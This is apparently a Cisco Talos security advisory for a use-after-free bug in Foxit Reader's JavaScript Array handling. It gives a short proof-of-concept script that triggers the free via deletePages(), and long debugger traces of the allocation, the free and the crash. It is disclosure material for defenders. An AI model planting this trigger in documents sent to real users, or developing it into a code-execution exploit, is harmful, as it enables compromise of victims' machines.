CVE-2026-3779
A use-after-free vulnerability exists in the way Foxit Reader handles an Array object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2025.3.0.35737
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles an array object. This can be illustrated by the following proof-of-concept code:
function main() {
app.activeDocs[0].getField('List Box0').setItems(['a',app.activeDocs[0]["IDS_MONTH_INFO"]]);
getField("txt2").setAction("Calculate",'delete_pages();');
app.activeDocs[0].getField('List Box0')['value'] = new Array(10);
}
function delete_pages() {
app.activeDocs[0].deletePages();
}
The above code simply assigns a callback function to Calculate event for the field txt2, which is promptly triggered by call to getField . In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when an array object is freed by deletePages() and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
:007> p
Breakpoint 1 hit
Time Travel Position: 288B55:368
FoxitPDFReader!safe_vsnprintf+0x3404c7:
00007ff6`f8f076d7 b948000000 mov ecx,48h ;<------------- (1)
0:007> p
Time Travel Position: 288B55:369
FoxitPDFReader!safe_vsnprintf+0x3404cc:
00007ff6`f8f076dc e81fa72c00 call FoxitPDFReader!safe_vsnprintf+0x60abf0 (00007ff6`f91d1e00) ;<------------- (2)
0:007> p
Time Travel Position: 288B6A:B5F
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000 mov qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> r
rax=000002484298bfb0 rbx=00000248377dafd0 rcx=000000007ffe0380
rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=00000248351ddfb0
rip=00007ff6f8f076e1 rsp=000000af78be7fa0 rbp=000000af78be80a0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=000002484298bfb0 r12=00000248351ddfb0 r13=0000000000000000
r14=00007ff6fe5c27b8 r15=00000248377daeb0
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000 mov qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> dd 000002484298bfb0 ;<------------- (3)
00000248`4298bfb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bff0 c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
00000248`4298c000 ???????? ???????? ???????? ????????
00000248`4298c010 ???????? ???????? ???????? ????????
00000248`4298c020 ???????? ???????? ???????? ????????
The vulnerable object is created by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3).
0:007> r
rax=0000000000000001 rbx=00000248377dafd0 rcx=0000024854540000
rdx=0000024854540000 rsi=000002482280cfc0 rdi=000002484298bfb0
rip=00007ff6f8f0a1e1 rsp=000000af78bebea0 rbp=000000000000000a
r8=0000000000000000 r9=0000000000000001 r10=00000000ffffffef
r11=000000af78bebdd0 r12=000000af78bebf78 r13=00000248377daeb0
r14=0000000000000000 r15=00000248351ddfb0
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
FoxitPDFReader!safe_vsnprintf+0x342fd1:
00007ff6`f8f0a1e1 488bcf mov rcx,rdi ; <---------------- (4)
0:007> p
Time Travel Position: 3720A9:254
FoxitPDFReader!safe_vsnprintf+0x342fd4:
00007ff6`f8f0a1e4 e8f77c2c00 call FoxitPDFReader!safe_vsnprintf+0x60acd0 (00007ff6`f91d1ee0) ; <---------------- (5)
[...]
0:007> p
Time Travel Position: 3720A9:273
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a66:
00007ff6`fc7d1116 4883ec20 sub rsp,20h
0:007> p
Time Travel Position: 3720A9:274
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6a:
00007ff6`fc7d111a 4c8bc1 mov r8,rcx ; <---------------- (6)
0:007> dd rcx
00000248`4298bfb0 00000007 00000000 377daeb0 00000248
00000248`4298bfc0 351ddfb0 00000248 00000000 00000000
00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000 ???????? ???????? ???????? ????????
00000248`4298c010 ???????? ???????? ???????? ????????
00000248`4298c020 ???????? ???????? ???????? ????????
0:007> p
Time Travel Position: 3720A9:275
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6d:
00007ff6`fc7d111d 33d2 xor edx,edx
0:007> p
Time Travel Position: 3720A9:276
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6f:
00007ff6`fc7d111f 488b0d128fde02 mov rcx,qword ptr [FoxitPDFReader!fLI::FLAGS_v+0xb9af0 (00007ff6`ff5ba038)] ds:00007ff6`ff5ba038=0000024854540000
0:007> p
Time Travel Position: 3720A9:277
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a76:
00007ff6`fc7d1126 ff158cc08900 call qword ptr [FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x2515b08 (00007ff6`fd06d1b8)] ds:00007ff6`fd06d1b8={KERNEL32!HeapFreeStub (00007ff8`323c58b0)} ; <---------------- (7)
0:007> p
Time Travel Position: 3720AE:249
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a7c:
00007ff6`fc7d112c 85c0 test eax,eax
0:007> dd 00000248`4298bfb0 ; <---------------- (8)
00000248`4298bfb0 00000007 00000000 377daeb0 00000248
00000248`4298bfc0 351ddfb0 00000248 00000000 00000000
00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000 ???????? ???????? ???????? ????????
00000248`4298c010 ???????? ???????? ???????? ????????
00000248`4298c020 ???????? ???????? ???????? ????????
Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It calls a method at (5), which in turn calls the HeapFree function at (7) to free the vulnerable object. The rcx register at (6) contains a pointer to the vulnerable object. The method called at (7) frees the object, and the contents of the object are examined at (8) after the free operation. Note that the analysis was performed using a TTD trace, and at (8) the TTD index shows the last recorded values of the address after it was freed.
The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:
0:007> g
(144c.d20): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 372B43:0
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0 ;<---------------- (9)
0:007> u
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h]
00007ff6`f8f1db6f e82c99ffff call FoxitPDFReader!safe_vsnprintf+0x350290 (00007ff6`f8f174a0)
00007ff6`f8f1db74 4885c0 test rax,rax
00007ff6`f8f1db77 7405 je FoxitPDFReader!safe_vsnprintf+0x35696e (00007ff6`f8f1db7e)
00007ff6`f8f1db79 803805 cmp byte ptr [rax],5
00007ff6`f8f1db7c 7470 je FoxitPDFReader!safe_vsnprintf+0x3569de (00007ff6`f8f1dbee)
00007ff6`f8f1db7e 8b03 mov eax,dword ptr [rbx]
00007ff6`f8f1db80 83e807 sub eax,7
0:007> r
rax=00000000ffffffff rbx=000002484298bfb0 rcx=000002484298bfb0
rdx=00007ff6fe5c2758 rsi=0000000000000001 rdi=000000af78bed1c8
rip=00007ff6f8f1db6b rsp=000000af78bed090 rbp=0000000000000001
r8=0000000000000000 r9=0000000000000001 r10=00000000ffffffef
r11=000000af78becf40 r12=0000000000000009 r13=000000af78bed310
r14=000000000000000a r15=00007ff6fe5c2758
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910 mov rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0
0:007> dd 000002484298bfb0
00000248`4298bfb0 00000007 00000000 377daeb0 00000248
00000248`4298bfc0 351ddfb0 00000248 00000000 00000000
00000248`4298bfd0 2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0 00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0 00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000 ???????? ???????? ???????? ????????
00000248`4298c010 ???????? ???????? ???????? ????????
00000248`4298c020 ???????? ???????? ???????? ????????
0:007> kb
# RetAddr : Args to Child : Call Site
00 00007ff6`f8f1db34 : 00000000`00000001 000000af`78bed1c8 000000af`78bed230 00000000`00000009 : FoxitPDFReader!safe_vsnprintf+0x35695b
01 00007ff6`fa40f92f : 00000000`00000001 000000af`78bed218 00000000`00000000 00000000`00000001 : FoxitPDFReader!safe_vsnprintf+0x356924
02 00007ff6`fa3f2b10 : 000000af`78bed300 000000af`78bed328 000000af`78bed3d0 000000af`78bed420 : FoxitPDFReader!safe_vsnprintf+0x184871f
03 00007ff6`fa41d2e1 : 00000248`1f0b6e40 000000af`78bed420 00000000`00000001 00000248`34bc3000 : FoxitPDFReader!safe_vsnprintf+0x182b900
04 00007ff6`fa3e5cda : 00000248`1f0b6e40 00000000`00000000 000000af`78bed430 00000248`1f0b6e40 : FoxitPDFReader!safe_vsnprintf+0x18560d1
05 00007ff6`fa8d91b4 : 00000248`34bc3000 00000248`30804ff0 00000248`41b9fff0 00000248`42d40fe0 : FoxitPDFReader!safe_vsnprintf+0x181eaca
06 00007ff6`fa9722a2 : 00000248`450a20f0 000000af`78bedd08 000000af`78bed480 000000af`78bedce8 : FoxitPDFReader!FXJSE_GetClass+0x824
07 00007ff6`fa98a482 : 000000af`78bedc00 000000af`78bed699 000000af`78bedcf0 00000248`450a20f0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2
08 00007ff6`fa98a15d : 000000af`78bedd08 00000000`00000000 000000af`78bedd08 000000af`78bed968 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2
09 00007ff6`fa98ab3b : 00000000`00000000 00000248`450a20e8 00000000`00000000 00000000`00000000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad
0a 00007ff6`fa98a0ed : 000000af`78bedd08 000000af`78beda01 000000af`78bedd08 00007ff6`f7270000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b
0b 00007ff6`fa989d1d : 00000251`00098305 00000002`faaa7f01 00000248`34bc3000 00000251`001b78ad : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d
0c 00007ff6`fb061c38 : 00000000`00000001 000000af`78bedc01 000000af`78bedad0 00000000`0000004e : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d
0d 00007ff6`fb058cdc : 00000000`00000000 00000248`450a4000 00000248`00000003 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50a588
0e 00007ff6`faf07bee : 00007ff6`fb058ab0 00000251`001d1675 00000000`0000004e 00000248`450a20d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50162c
0f 00007ff6`faff461b : 00000251`00000e2d 00000251`00098305 00000251`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b053e
10 00007ff6`fae5bfa1 : 00000251`0009e8e1 00000251`001eb615 00000000`00000014 00000251`0018abb1 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49cf6b
11 00007ff6`fae5bfa1 : 00000251`001d160d 00000251`001eb51d 00000251`001eb56d 00000251`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
12 00007ff6`fae596d0 : 00000251`001d160d 00000251`00000775 00000251`001eb51d 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
13 00007ff6`fae59227 : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302020
14 00007ff6`fa92f07f : 000000af`78bee0fc 000000af`78bedfe9 000000af`78bee168 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x301b77
15 00007ff6`fa92eb24 : 000000af`78bee168 00000248`34bc3000 00000251`001e0005 00000248`34bcc110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
16 00007ff6`fa90ea1b : 00000248`34bc32b0 000000af`78bee210 00000248`2d161a50 00000248`450a2020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
17 00007ff6`fa90e781 : 00000248`450a2050 00000248`450a2018 00000248`34bc3000 00000248`44b56fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
18 00007ff6`fa8d6746 : 00000248`41ab3ff0 00000248`450a2050 00000248`450a2018 00000248`41ab3ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
19 00007ff6`fa8d768b : 00000248`450a2050 00000248`41ab3ff0 00000248`4509be90 00000248`450a2020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1106
1a 00007ff6`fa37f35d : 00000000`00000000 00000248`30ac2fb8 00000248`30ac2fb8 00000248`30ac2fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
1b 00007ff6`f7e3dde3 : 00000248`00000003 00000248`1823cb90 000000af`78bee610 000000af`78bee530 : FoxitPDFReader!safe_vsnprintf+0x17b814d
1c 00007ff6`f7e3c4b3 : 00000248`00535ff0 000000af`78bee5c0 00000000`00000000 00000248`1a87afb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3ab453
1d 00007ff6`f7e3a866 : 00007ff6`f7e3a790 00000248`00535ff0 00000248`44a94d30 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a9b23
1e 00007ff6`f74992d9 : 00007ff6`f7e3a790 000000af`78bee700 00000248`37bc2dc8 00000248`02c5cfd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7ed6
1f 00007ff6`f772a93e : 00000000`00000000 00000000`00060510 00000248`1a87afb0 000000af`78bee740 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7909
20 00007ff6`fc43bbfa : 00000000`00000189 00000000`00000001 00007ff6`f772a8c0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7023e
21 00007ff6`fc43d107 : 00000248`35104cb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e454a
22 00007ff6`fc43602c : 00000000`00000000 00000248`5a292eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e5a57
23 00007ff6`fc436aec : 00007ff6`ff382078 00000000`00060510 00000248`5a292e78 00007ff6`fc42c690 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18de97c
24 00007ff8`31d6ef5c : 00000000`00000001 00000248`5a292e20 00000000`00060510 00000000`00060510 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18df43c
25 00007ff8`31d6e684 : 00000000`00000000 00007ff6`fc436a98 000000af`78dd2800 00007ff6`fc42e33c : USER32!UserCallWinProcCheckWow+0x50c
26 00007ff6`f76a8c7a : 00007ff6`fc436a98 00000248`024875d0 00000000`00000001 00007ff6`ff5bb190 : USER32!DispatchMessageWorker+0x494
27 00007ff6`f76a8d74 : 00000000`00000001 00007ff6`ff5bb190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x15f0fa
28 00007ff6`fca24eb7 : 00000000`00000001 00007ff6`f7270000 00000000`00000000 00000248`545bdf3c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x15f1f4
29 00007ff6`fc69bdf2 : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1ecd807
2a 00007ff8`323c7374 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b44742
2b 00007ff8`33c9cc91 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
2c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
The crash occurs at (9) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
2026-02-10 - Vendor Disclosure
2026-03-31 - Vendor Patch Release
2026-03-31 - Public Release
Discovered by KPC of Cisco Talos.